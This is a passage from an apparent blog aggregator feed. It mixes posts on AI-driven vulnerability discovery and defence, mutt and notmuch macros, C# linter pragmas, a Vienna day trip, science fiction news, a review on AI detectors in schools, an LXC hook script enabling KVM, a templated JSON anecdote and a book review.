That was the last straw for me. I left that company before I was forced to deal with any of Facebook's crap.

My second whale sighting occurred at a startup that'd landed Porsche, far and away their biggest client ever. All of a sudden, our timeline for adding new features and fixing bugs became Porsche's honey-do list. All of a sudden, the platform frequently crashed and became unusable for everyone because it couldn't handle the amount of traffic Porsche (and their clients) hurled at it.

On the other hand, there were several times in that startup's existence when a big wad of promised funding failed to materialize. Porsche kept the business afloat and literally kept my lights on.

I find it less than ideal to be at any company's mercy. I want a world that would neither spawn whales nor millions of startups named Sploink, Dink, and Twangle that promise to bring the power of AI to your dinner fork.

Have your own epic whaling adventures? Share with us in the comments!

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

,

Cryptogram What Anthropic’s Mythos Means for the Future of Cybersecurity

Two weeks ago, Anthropic announced that its new model, Claude Mythos Preview, can autonomously find and weaponize software vulnerabilities, turning them into working exploits without expert guidance. These were vulnerabilities in key software like operating systems and internet infrastructure that thousands of software developers working on those systems failed to find. This capability will have major security implications, compromising the devices and services we use every day. As a result, Anthropic is not releasing the model to the general public, but instead to a limited number of companies.

The news rocked the internet security community. There were few details in Anthropic’s announcement, angering many observers. Some speculate that Anthropic doesn’t have the GPUs to run the thing, and that cybersecurity was the excuse to limit its release. Others argue Anthropic is holding to its AI safety mission. There’s hype and counterhype, reality and marketing. It’s a lot to sort out, even if you’re an expert.

We see Mythos as a real but incremental step, one in a long line of incremental steps. But even incremental steps can be important when we look at the big picture.

How AI Is Changing Cybersecurity

We’ve written about shifting baseline syndrome, a phenomenon that leads people—the public and experts alike—to discount massive long-term changes that are hidden in incremental steps. It has happened with online privacy, and it’s happening with AI. Even if the vulnerabilities found by Mythos could have been found using AI models from last month or last year, they couldn’t have been found by AI models from five years ago.

The Mythos announcement reminds us that AI has come a long way in just a few years: The baseline really has shifted. Finding vulnerabilities in source code is the type of task that today’s large language models excel at. Regardless of whether it happened last year or will happen next year, it’s been clear for a while this kind of capability was coming soon. The question is how we adapt to it.

We don’t believe that an AI that can hack autonomously will create permanent asymmetry between offense and defense; it’s likely to be more nuanced than that. Some vulnerabilities can be found, verified, and patched automatically. Some vulnerabilities will be hard to find but easy to verify and patch—consider generic cloud-hosted web applications built on standard software stacks, where updates can be deployed quickly. Still others will be easy to find (even without powerful AI) and relatively easy to verify, but harder or impossible to patch, such as IoT appliances and industrial equipment that are rarely updated or can’t be easily modified.

Then there are systems whose vulnerabilities will be easy to find in code but difficult to verify in practice. For example, complex distributed systems and cloud platforms can be composed of thousands of interacting services running in parallel, making it difficult to distinguish real vulnerabilities from false positives and to reliably reproduce them.

So we must separate the patchable from the unpatchable, and the easy to verify from the hard to verify. This taxonomy also provides us guidance for how to protect such systems in an era of powerful AI vulnerability-finding tools.

Unpatchable or hard to verify systems should be protected by wrapping them in more restrictive, tightly controlled layers. You want your fridge or thermostat or industrial control system behind a restrictive and constantly updated firewall, not freely talking to the internet.

Distributed systems that are fundamentally interconnected should be traceable and should follow the principle of least privilege, where each component has only the access it needs. These are bog-standard security ideas that we might have been tempted to throw out in the era of AI, but they’re still as relevant as ever.

Rethinking Software Security Practices

This also raises the salience of best practices in software engineering. Automated, thorough, and continuous testing was always important. Now we can take this practice a step further and use defensive AI agents to test exploits against a real stack, over and over, until the false positives have been weeded out and the real vulnerabilities and fixes are confirmed. This kind of VulnOps is likely to become a standard part of the development process.

Documentation becomes more valuable, as it can guide an AI agent on a bug-finding mission just as it does developers. And following standard practices and using standard tools and libraries allows AI and engineers alike to recognize patterns more effectively, even in a world of individual and ephemeral instant software—code that can be generated and deployed on demand.

Will this favor offense or defense? The defense eventually, probably, especially in systems that are easy to patch and verify. Fortunately, that includes our phones, web browsers, and major internet services. But today’s cars, electrical transformers, fridges, and lampposts are connected to the internet. Legacy banking and airline systems are networked.

Not all of those are going to get patched as fast as needed, and we may see a few years of constant hacks until we arrive at a new normal: where verification is paramount and software is patched continuously.

This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum.

Planet DebianAbhijith PA: Patience could've saved me time.

If I had been patient, it would have saved me time. One such instance is following.

From my early blogs, you might know I am using mutt to do email. Just after I get along with mutt, I started using notmuch. Because limit search in mutt is always a pain when you have multiple folders. And what better tool out there than notmuch-mutt to bind both these.

notmuch-mutt provide three macros by default.

macro index <F8> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<shell-escape>notmuch-mutt -r --prompt search<enter>\
<change-folder-readonly>`echo ${XDG_CACHE_HOME:-$HOME/.cache}/notmuch/mutt/results`<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: search mail"
macro index <F9> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<pipe-message>notmuch-mutt -r thread<enter>\
<change-folder-readonly>`echo ${XDG_CACHE_HOME:-$HOME/.cache}/notmuch/mutt/results`<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: reconstruct thread"
macro index <F6> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<pipe-message>notmuch-mutt tag -- -inbox<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: remove message from inbox"

One for search, one for reconstructing threads and one for manipulating tags, which I missed.

Now my impatient part. I have already mapped f6 for my folder movements and in my initial days of notmuch, I only use just search. So I never cared about the f6 macro provided by notmuch-mutt. As time goes by I got very comfortable with notmuch. I was stretching my notmuch legs. I started to live more on notmuch search results date:today tag:unread than more on the mutt index. To the problem, since notmuch-mutt dump all results to a temp maildir location, can’t perform flag changes back to the original maildir which was annoying, because we need to distinguish what mail you read and what not when you subscribed to most of all debian mailing list.

I was under the impression that, the notmuch-mutt is not capable of doing so and I just went like that without checking docs. I started doing all crazy hack to sync these maildirs.

I even started reading notmuch-mutt codebase.

Later, I settled on notmuch-vim. Cause I can manipulate flags sync back from notmuch to maildir.

And while searching for something, I accidentally revisited the the the notmuch-mutt macro page and saw the tag manipulation. I was like :( .

If I read about the third macro patiently when added that to config, I could’ve saved time by not doing ugly hacks around it.

I think I learned my lesson.

Worse Than FailureCodeSOD: Lint Brush Off

A few years back, C# added the concept of "primary constructors". Instead of declaring the storage for class members and then initializing them in the constructor, you can annotate the class itself with the required fields, and C# automatically generates a constructor for you. It's all very TypeScript and very Microsoft, and certainly cuts down on some boilerplate.

Esben B's team isn't really using them in many places, but they are using a linter which is opinionated about them. So this in-line constructor causes the linter to complain:

    public DocumentNetworkController(ILookupClient service)

The linter wants you to switch this to a primary constructor. Esben didn't want to do that, and didn't want to change the global linter configuration, and so added a pragma to disable that particular warning:

#pragma warning disable IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290

The linter didn't like this. It threw a new warning: that this suppression wasn't needed. Which was news to Esben, as clearly the suppression was needed if you wanted to make the warnings go away. The obvious solution was to disable the warning that you didn't need to disable the warning:

#pragma warning disable IDE0079, IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290, IDE0079

Except this doesn't work. These pragmas take effect on the next line, which means you can't disable IDE0079 on the same line as IDE0290 and expect it to work. Which means the final version of the code looked like this:

#pragma warning disable IDE0079 // Disable warning about not needed supression
#pragma warning disable IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290, IDE0079

Esben writes:

So the nice recommendation to use a primary ctor ended up with 3 lines of annoying boilerplate code. Good times \o/

While yes, this is frustrating, I will say there's an element of "when the table saw keeps taking fingers off, that may be more of a you problem." I don't know the details, so I can't say, "just change the linter config or adopt its recommendation" and claim that the problem goes away, but when the tool hurts you, it's a definite sign of one of two things: it's either the wrong tool, or you're using it wrong.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsDensity

Author: Majoki While Mr. Patella lectured on quantum entanglement, Jeremy’s right hand almost slipped through his desk. His fingers and palm were halfway through the scratched laminate surface before he noticed. He felt himself gradually slipping through the rigid plastic of his chair. A prickly panic edging down his spine, he looked around to see […]

The post Density appeared first on 365tomorrows.

Planet DebianRavi Dwivedi: A day in Vienna

On the 7th of September 2025, my friend Dione and I had a day trip to Vienna—the capital of Austria. We were attending a conference in Budapest, Hungary, which is 250 km from Vienna. So, it was a good opportunity to visit Vienna.

We took a morning train from Budapest to Vienna and got back to Budapest by night. However, booking these tickets turned out to be a bit complicated. There were many websites to book the train ticket—Hungarian Railways, Austrian Railways, and third-party sites such as Omio. All these websites had different prices for the same ticket.

I booked the tickets from the Hungarian Railways website as it was the cheapest. The train from Budapest to Vienna was €13, operated by Eurocity. Also, I had to pay €2 for the seat reservation on top. The train from Vienna to Budapest—operated by Railjet—was €21, along with €2 extra for reservation again—making it €23. The tickets for the two-way journey added up to €38.

The cost of these tickets varied depending on when one purchses them: the sooner you purchase, the lower the price. I bought my tickets 15 days ahead of the date of journey and paid just €38. In contrast, Dione booked just one day before her trip and paid around €100 for her tickets.

As for the seat reservation, long-distance trains in Europe usually require paying extra for the seat reservation. This ensures that you get your preferred seat, such as a window seat or an aisle seat. Nevertheless, you will get a seat on long-distance trains because they do not sell more tickets than there are seats. Therefore, you will get a seat without reservation as well. However, we reserved our seats so that we can sit together. This helped us more in the return part of the journey—from Vienna to Budapest—which was more crowded than the train we took from Budapest to Vienna in the morning.

On another note, reservation is mandatory on some trains in Europe, but ours wasn’t one of them. In addition, people also use rail passes, so an extra charge is required on top for reserving the seats for pass holders. On the other hand, local trains do not require seat reservations in general.

Our train’s scheduled departure was at 08:55 from the Budapest Kelenfold station. We reached the train station 40 minutes before the train’s scheduled departure. The Kelenfold station had free Wi-Fi, which was handy because I didn’t have a local SIM.

A departures board at Budapest Kelenfold station.

A departures board at Budapest Kelenfold station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A platform on Budapest Kelenfold station.

This is platform number 15 of Budapest Kelenfold station where we boarded our train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Our train arrived on time. I tried to find our coach number but could not find the numbers written anywhere on the side of the coach. Luckily, we were helped by a fellow passenger who directed me to look at the doors, where the numbers were mentioned clearly!

Then we got into our compartment and took our respective seats. Our tickets were checked twice - once while the train was in Hungary and the other when in Austria. Showing the PDF of the train ticket on our mobile to the ticket inspector was good enough for the purpose. Austria and Hungary are a part of the open transit Schengen area, which means this was the extent of the border control checks we had to go through.

Interior of the train.

Interior of our Budapest to Vienna train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The train also had free Wi-Fi, albeit with poor connection at times. There were no eatery options inside the train.

We deboarded at the Wien Hauptbahnhof station in Vienna. The journey was 250 km and took 2.5 hours, reaching Vienna at 11:25, which was the scheduled time.

A blue and white colored train on a railway platform

This blue colored train was the one we took for our Budapest to Vienna journey. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A red colored train standing at the Vienna station

An ÖBB train standing at a platform of Vienna train station. ÖBB is the national carrier of Austria. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Wien Hauptbahnhof train station

Wien Hauptbahnhof train station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

At the station, we bought a 24-hour public transport pass from a ticket machine for €8. The pass includes unlimited access to all the public transport in Vienna for 24 hours. My pass was valid from the 7th of September at 11:34 to the 8th of September at 11:33. A single public transport ticket (from anywhere to anywhere) costs €2.4. A single ticket of €2.4 can be used once on any public transport in Vienna—trams, metros, and buses.

Therefore, the pass is a good deal if you are going to take at least four public transport trips in a day. Unlike the public transport pass I got in Budapest, the pass in Vienna was anonymous and not tied to the rider’s name.

Public transport pass for Vienna.

My public transport pass in Vienna.

We wanted to visit the Schönbrunn Palace. The palace was reachable by subway. In order to get to the subway station, we started by going outside the station. But it was not outside. So we came back inside the station building and realized that the subway was underground.

We took the subway and deboarded at the Schönbrunn subway station—the closest one to the palace. The ride was smooth; the train was pretty silent.

By the way, like Budapest, there were no AFC gates for boarding the subway in Vienna. The stations had ticket validators instead, where you are supposed to validate your tickets before getting into the subway.

Vienna subway

Instead of AFC gates, Vienna has ticket validators as in the picture. You need to tap your ticket in the validator before boarding the subway. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

These validators are in place to ensure that you use your ticket only once. Unlike AFC gates, which are present in metros of most of the countries I have been to, the ticket validators don’t act as a physical barrier to enter the boarding area.

If you board the metro without validating your ticket, you will be facing hefty fines upon getting caught. I have heard that the fine is around €100. On the other hand, if you have a public transport pass like we did, then you don’t need to validate it before boarding.

In addition, there were no annoying security checks either, unlike in Indian cities. In the Delhi metro, for example, you would need to scan your bags and pass through a security check before getting to the AFC gates.

Vienna subway

Vienna subway. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Now back to the story, after alighting at the Schönbrunn subway station, we walked to the Schönbrunn Palace. One can roam around outside the palace and click pictures for free. To go inside, however, requires buying tickets. The tickets for the palace can be booked in advance on the internet. We didn’t take the tickets in advance, as we decided to visit the palace at the last moment.

So we went to the ticket counter and found out that we needed to wait for 1 hour 40 minutes before going inside if we took the tickets at that moment. In addition, one ticket costs €44 (around 4000 Indian rupees). Since we had to return to Budapest in the evening and only had a few hours in the city, we decided not to go inside the palace. Instead, we clicked a few pictures outside the palace.

Photo of Schönbrunn Palace.

Schönbrunn Palace. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The Schönbrunn Palace is a UNESCO World Heritage Site and is a historically significant place. It servedas one of the residences of the powerful Habsburg dynasty. The palace looked so good that my friend Dione said, “It seemed like the palace was built yesterday”. This remark applied to other parts of Vienna we went to. For example, the subway stations also seemed like they were built yesterday.

A street near Schönbrunn Palace.

A street near Schönbrunn Palace. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Now, we wanted to go someplace to grab a bite. I asked my friend Urbec for suggestions on where to go. They suggested we visit the steps named Strudlhofstiege, which had the added benefit of being in a neighborhood with good bakeries and buildings.

So, we took the subway and deboarded at the Roßauer Lände station, followed by walking around a kilometer to reach the stairs.

A subway station in Vienna.

Roßauer Lände subway station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Platform of the _Roßauer Lände_ subway station.

Platform of the Roßauer Lände subway station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

stairs with road in the front and trees in the background. Blue sky can also be seen in the background.

The The Strudlhofstiege steps. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

On the way, we were also looking for a place to eat. Unfortunately, it was Sunday, and Vienna closes on Sunday. That means most of the shops—including bakeries and cafés—are closed. Only places like railway stations have shops open on Sundays.

By the way, walking around in the streets of Vienna was a treat. The streets were not crowded (as it was not exactly a touristy neighborhood) and had good pedestrian infrastructure, with clean streets and separate cycling tracks. The buildings were also beautiful.

Buildings and streets in Vienna.

A random street in Vienna.

Buildings and streets in Vienna.

Another street in Vienna.

After some walking, we found a restaurant open. I grabbed the menu to check the prices. A lady at the shop asked me what I was doing, and I told her that I was browsing the menu. She said that the menu was in German. I don’t know how she knew that we didn’t know German, but it seemed like a racist thing to be told.

We roamed around further and found a café by the name of Blue Orange, where we ordered coffee and croissants. When we got our order, the waiter told us that they were having some issues, so they wouldn’t charge us for the croissant if it wasn’t good.

Picture of a café.

A picture of Blue Orange café. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

My friend and I took a bite, and both of us didn’t like the croissant. After some time, the waiter came to us and asked whether the croissant was okay, to which we said no. Therefore, they didn’t charge us for the croissant. This was the first time something like this happened to me. It felt like I was in a different world. I added a small tip at the end for this gesture, which I had to put in a jar at the counter.

The cappuccino I ordered was €4.50, while the espresso that Dione ordered was €3.60. The croissant would have been €3.60. I remember Paris having cheaper croissants!

Then when the waiter brought our drinks out, they automatically gave me the espresso and Dione the cappuccino. Dione found this funny because there is a stereotype in her country (Australia) that men drink strong black coffee, and women drink milky drinks like cappuccinos. She found it interesting that this stereotype seems to exist in Austrian culture too.

We hopped on a tram to reach the nearest subway station and went to the Wien Hauptbahnhof station to have something before we caught our return train to Budapest.

Trams with buildings and the blue sky in the background

Trams in Vienna. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

At the station, I had Esterhazyschnitten and Punschkrapfen (thanks, Urbec, for the suggestion). The lady at the shop warned me that punschkrapfen had alcohol in it, to which I said okay.

Esterhazyschnitten was a cake made of almonds, while punschkrapfen was a jam-filled sponge cake, soaked in rum. Esterhazyschnitten was my favorite out of the two. The punschkrapfen was too sweet for my taste.

Punschkrapfen

Punschkrapfen. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Esterhazyschnitten

Esterhazyschnitten. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

While the station was well-built, there were a couple of things about the Wien Hauptbahnhof station that we didn’t like. There were no seats inside the station, so we had to eat outside the building. Also, the toilets needed to be paid for. It costs 50 cents to use the toilets at this station.

The Vienna train station had departure boards all over the place. So, we went to the platform our train was to arrive on.

A departure board in Vienna displaying information about the trains

Departure boards in Vienna displaying information about the trains. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Platform and tracks at Wien Hauptbahnhof station.

Platform and tracks at Wien Hauptbahnhof station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

When our train arrived, we had some difficulty locating our compartment. This train was operated by a different company (Railjet) than the one we took in the morning (Eurocity) from Budapest to Vienna, and we were able to locate the coach numbers using the digital board at the station. Each compartment had a digital board next to it on the station displaying the coach number. However, that wasn’t the problem. Even after reading the coach numbers and trying to find ours, it didn’t appear where we expected in the sequence.

When we were not able to find our coach for a while, we asked a ticket inspector of the train who was standing on the platform. He directed us towards the front side of the train. So we started running to the front side as we didn’t know how long the train stops.

As we ran toward our coach, we found out that the engine of the back train was connected with the last compartment of the train at the front. At that point, we realized that the train was a combination of two trains. At a later station, the train on the back side parted ways and went towards Vienna Airport.

Inside our train.

Interior of the train we took from Vienna to Budapest. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A red colored train standing on the platform of Budapest Kelenfold station.

This is the train we took for our return journey from Vienna to Budapest. It is standing on a platform in Budapest Kelenfold station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

We had a smooth journey and reached Budapest a couple of hours later.

Vienna is a beautiful city; we enjoyed being there, and we would like to visit the city again!

That’s it for now. Signing off. See you in the next one!

Credits: Thanks to Dione and Badri for proofreading.

,

David BrinScience Fiction News!

The next World Science Fiction Convention - LAConV - will be held in Anaheim near Los Angeles August 27-31 2026. Among the featured events will be a live performance of my science-fictional - and theological - play "The Escape!" (If you are a theater producer/director, contact me for a show pass!.

 

Science Fiction's prestigious Hugo Award finalist list came out this morning! Vote as a member of the 84th annual World Science Fiction Convention in Anaheim, California, Or pick up a virtual membership which gives you the ability to access some of our awesome programming from afar for just $85.00! Either way, if you join soon, you can vote in the Hugos!

(Hugo Awards are also great mantel ornaments, if you balance the effect with three of them. Take my word for that.)

Oh... hint... have a look at what might (I suggest) be a good nominee for Best SF-related nonfiction of 2026!

My nonfiction collection, Through Stranger Eyes: Reviews, Introductions, Tributes and Iconoclastic Essays - has been re-released.


== Good things to read, meanwhile ==


Barnes & Noble list 25 basic science fictional ‘tropes’, giving examples of each, from teleportation to hyperdrive to alien invasion.  My works are cited as examples twice. Fun list! 

Now available in e-version! Subterranean sold out of their deluxe collector’s edition of The Best of David Brin. Now it’s available in e-version. And just released in paperback by Amazing Stories.

If you missed my serialized sci fi comedy novel entitled The Ancient Ones… here’s a link to the first 8 or so chapters with lovely illustrations. And lots of Yuks! (Or else yucks, you decide!)

Speaking of sci fi comedy… Dang. This Star Trek one - Beam Me Up, Bubba! - makes AI worthwhile!


And one more of mine: Can industrial innovation be restored, down at the level of amateurs, hobbyists and local love of skill? Here’s my own comic book about American innovation in the near future is TINKERERS!  


Terry Pratchett's comedy series is now a fun movie: The Color of Magic.


And more pertinent than ever, for right now. “Brin reads the opening of EXISTENCE.”

 

      == Meanwhile… ==

Oh, human augmentation is also the topic of a whole chapter in ailien minds!


It's a theme that's straight outta sci fi and while I give talks to defense folks about Human Augmentation... the "Enhanced Games" will allow athletes who use performance-enhancing drugs, as in Achilles' Choice by Niven & Barnes. Let's have 5+ Olympics:


1. A return to a core one for amateurs

2. One for pros

3. The Special, of course for those who overcome so much

4. Robots! and animals

5. Cyborgs! And

6. Dome flying on the moon!... and a 7th on open-invite to any aliens or uplifted critters who wanna come on down and join in. Keep inviting till someone shows.


And no. SNUB the UFO guys! They are nasty bad-guests, if they exist. (And they likely don't.)



== Okay... this one impressed me... ==


Someone prompted an LLM to write a prologue and 1st chapters of an uplift novel in the style of David Brin. Have a look fif you like. Interestingly, the intellectual content of the piece... its complexity and pertinence of ideas... is almost satisfactory, while the basic mechanics of style and fiction narrative are so lacking that I'd have to spend hours tutoring a young author in my Out of Time YA series, in order to get it close to my standards of basic craft. My universe? Perhaps. My style? Puh-lease.




 == More SciFi News ==


I truly am still writing sci fi... or at least helping others to do so.


My YA series Yanked -- or David Brin's Out of Time series* - has been re-released, with new additions, including Storm's Eye by October K. Santerelli, and The Archimedes Gambit by Patrick Freivald. Re-releases of the original three by Kress, Finch and Allen. 




And now three more! Boondoggle by Tom Easton and Torion Oey, Raising the Roof, by Richard Doyle, and Snowdance by SciFi legend Allen Steele and Robin Orm Hansen!


You'll love em all!


Finally... a reminder:  I'm posting my SF comedy The Ancient Ones, chapter by chapter. Samples were available on my website. Be ready for laughs + painful puns! And some sci fi concepts taken to um... extremes. Oh and there'll be freebies for best groaner comments to adjust the final version.



*The “Out of Time” (or “Yanked!”) series: Only teens can teleport through time and space! Dollops of fun, adventure & optimism for young adults.


Planet DebianGunnar Wolf: Heads we win, tails you lose — AI detectors in education

This post is an unpublished review for Heads we win, tails you lose — AI detectors in education

Educators throughout the world are tasked with the difficult requirement of evaluating students’ works, making sure the grades meaningfully reflect the students’ understanding of the subject, and that a graded assignment maps to the relevant work invested in solving it. After the irruption of Large-Language Models in late 2023, this task became obviously much harder: if a widely available computer program is able to solve an assignment in a way that resembles a human-generated response, how can educators meaningfully grade their groups?

As it has been the case with different innovations over time (such as with the appearance of electronic calculators or the mass availability of digital encyclopedias), the first reactions were of prohibition and denial: students who use the new tool in question are to be disqualified or somehow punished. It is only some time after the innovation in question settles that teachers find a way to properly weigh, integrate and accept its use.

The authors of this position article present several arguments as to why it is impossible, unethical and unadvisable to use automated AI detection systems to process student assignments. The first argument is whether it is at all possible to reliably differentiate human-written essays from LLM-generated artifacts. The first criticism is that AI detectors are, themselves, LLMs trained on human-generated texts (negative) and LLM-generated texts (positive). However, the only way to assert the training material is not noisy is to use pre-2020 text as human-generated — but natural ways of writing are influenced by what people read, and the authors quote studies pointing out that human language, particularly in the scholarly fields, has incorporated terms and constructions that were used as LLM markers. Quoting the authors, «As exposure to AI-generated material becomes increasingly widespread, it is reasonable to expect that the linguistic patterns of human writing will shift, reflecting the influence of AI-assisted texts encountered across education, media, and everyday communication». Stylistic elements and other such markers are being adopted back into regular speech at a high rate.

Then, the aspect of ethics comes into play as well. While it is expected that teachers should demand intellectual integrity from students, and plagiarism detectors have been widely accepted into the workflow of academics, the accusation of presenting LLM output as own work is necessarily an uphill battle: the accused party is tasked with providing proof of innocence based on nebulous, probabilistic accusations. The authors argue, once an accusation of turning in a LLM-generated text is made on a student, the onus on proving innocence lies with the accused.

The authors review and argue against a series of techniques that have been presented in literature to aid teachers in detecting LLM abuse, such as linguistic markers, single or multiple AI detectors, the use of false references, hidden adversarial prompts, arguing in all cases the techniques fail to be trustable enough and highlighting the probability of both false positives and negatives. They also present AI detection as a false dichotomy: many works presented are not 100% human generated nor 100% LLM-generated, but some pertinent LLM-generated paragraphs are presented mixed with human-generated content, in a positive, critical AI use (“Students’ work is frequently created with, not by, generative AI”).

The article closes by reiterating the authors’ position: “AI detection in education is not merely flawed; it is conceptually unsound”. they call upon institutions to accept the use of generative LLMs cannot be “solved through surveillance and punishment”, but has to be tackled by an “assessment design that recognizes AI’s role in learning”.

This article’s position is very strong and well argued, and although it will surely meet with ample opposition, it surely poses an important, very current problematic. As a teacher, I found it a very enlightening read.

Cryptogram Medieval Encrypted Letter Decoded

Sent by a Spanish diplomat. Apparently people have been working on it since it was rediscovered in 1860.

Planet DebianMike Gabriel: KVM Support inside LXC Containers [updated]

Yesterday, I had to add support for running KVM virtual machines inside an LXC container. More as a reminder to myself, in case I ever have to do this again, here the simple recipe:

LXC Container Config Adjustment

Enable lxc.autodev and execute hook script to be executed after initial /dev creation (updated 20260428: lxc.cgroup2.* instead of lxc.cgroup.*):

[...]

# Auto-create /dev nodes and add native KVM support to the LXC container
lxc.autodev = 1
lxc.hook.autodev = /var/lib/lxc/.hooks/lxc-hook.kvm-support
lxc.cgroup2.devices.allow = c 10:232 rwm
lxc.cgroup2.devices.allow = c 10:238 rwm
lxc.cgroup2.devices.allow = c 10:241 rwm

[...]

[added 20260408] On the internet, you can find a recipe that simply bind-mounts /dev/kvm from the host in to the LXC container. However, this fails if group ID of POSIX group kvm differs between host and container.

LXC Hook Script for KVM Support Enablement

The following script I placed at /var/lib/lxc/.hooks/lxc-hook.kvm-support (on the LXC host!):

#!/bin/sh

# set up native KVM support in LXC container
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/kvm c 10 232
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/kvm
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/vhost-net c 10 238
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/vhost-net
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/vhost-vsock c 10 241
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/vhost-vsock

Worse Than FailureCodeSOD: The JSON Template

We rip on PHP a lot, but I am willing to admit that the language and ecosystem have evolved over the years. What started as an ugly templating language is now just an ugly regular language.

But what happens when you still really want to do things with templates? Allison has inherited a Python-based, WSGI application which rejects any sort of formal routing or basic web development best practices. Their way of routing requests is simply long chains of "if condition then invokeA elif otherCondition then invokeB". Sometimes, those conditions will directly set the MIME type on the HTTP response.

They do use a templating library called Mako for generating their responses. They use it for their HTML responses, obviously. They also use it for their JSON responses, generating code like this:

{
    "success": true,
    "items": {
        %for item in items_available.keys():
        "${item}": ${items_available[item]}${',' if not loop.last else ''} 
        %endfor
        }   
}

The %for and matching %endfor mark the Python code off, which generates JSON via string-munging, complete with the check to make sure we're not on the last iteration of the loop.

Like so much bad code, this offers a degree of fractal wrongness. Instead of iterating over the keys and fetching the items inside the loop, you could iterate for key,value in items_available.items()- and according to the Mako docs, that for is just a regular Python for loop. That we're just outputting the contents of the dictionary is itself potentially a problem- sure, if we know the types of the dictionary, we'll know that whatever it is can be output in the body of a JSON document, but do we really think this code is using type annotations? I don't. And for a RESTful web service, I'm always going to feel weird about using a success field when ideally the HTTP status code could convey most of that information (and yes, I know there are reasons to still put status in the body, I just hate it).

Of course, the real issue is just: Python's built in JSON serialization is actually pretty advanced. And performant! You don't need any of this, you could just do something like:

return json.dumps({"success": true, "items": items_available})

No templates. No formatting. No worries about how the data gets represented. Well, still worries, because JSON serialier will throw exceptions if it doesn't know what to do with a type. But then at least you get that exception on the server side and aren't sending the client a malformed document.

In any case, this is a good demonstration that you can write bad PHP in any language.

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

365 TomorrowsBack For You

Author: Julian Miles, Staff Writer The evening sky is barely lit by the last ghost of sunset when Fern answers a knock at the door, pistol in the free hand behind her back. The world tilts as she recognises the figure standing there. Willing herself not to pass out, she says the first thing that […]

The post Back For You appeared first on 365tomorrows.

Planet DebianSahil Dhiman: Weekly Notes

Weekly notes is a genre where people chronicle their week on their blogs. Weekly notes are like a window. I love going through these, as they’re a steady stream of week on week happenings and progress in people’s lives. It shows people making efforts to improve: from basic things like learning to swim or drive, to planning long-term goals such as vacations, moving house, states, or even countries. In some cases, they carry internal monologues, thoughts, and anxieties. These are like a constant nudge for me to work on myself, like them.

These are the weekly notes I read nowadays:

Most are there on Thejesh’s weekly notes planet which autoupdates when new posts arrive, usually starting on Friday evenings, and by Monday, almost everyone has posted.

It reminds of a word from The Dictionary of Obscure Sorrows - Kenaway :

the longing to see how other people live their lives when they’re not in public; wishing you could tune in to the raw feed of another human existence, in all its messiness and solitude—shimmying in place while brushing their teeth, squabbling over where to put the shoes, talking out their problems on solitary commutes—if only to give you something to compare your own life against, and figure out whether you’re bizarrely normal or normally bizarre.

Close enough.

Planet DebianRuss Allbery: Review: What We Are Seeking

Review: What We Are Seeking, by Cameron Reed

Publisher: Tor
Copyright: 2026
ISBN: 1-250-36474-4
Format: Kindle
Pages: 339

What We Are Seeking is a bit hard to classify beyond science fiction. I think I would call it anthropological science fiction, but it's also a first contact story and a planetary colony story. It is a standalone novel (well, so far as I know; see later in the review for caveats). This is Cameron Reed's second novel after the excellent and memorable cyberpunk novel The Fortunate Fall, first published in 1996 under Reed's former name of Raphael Carter.

John Maraintha is a doctor from the world of Essius. He took what he thought was a temporary job on the Free Ship Edgar's Folly, where he's endured considerable culture shock. As the novel opens, John learns that the colonists on Scythia have requested a translator to talk to one of the native life forms, and a doctor since they're down to only one. John will be that doctor. The captain has decided, and by the rules of the free ships, John does not get a choice in the matter.

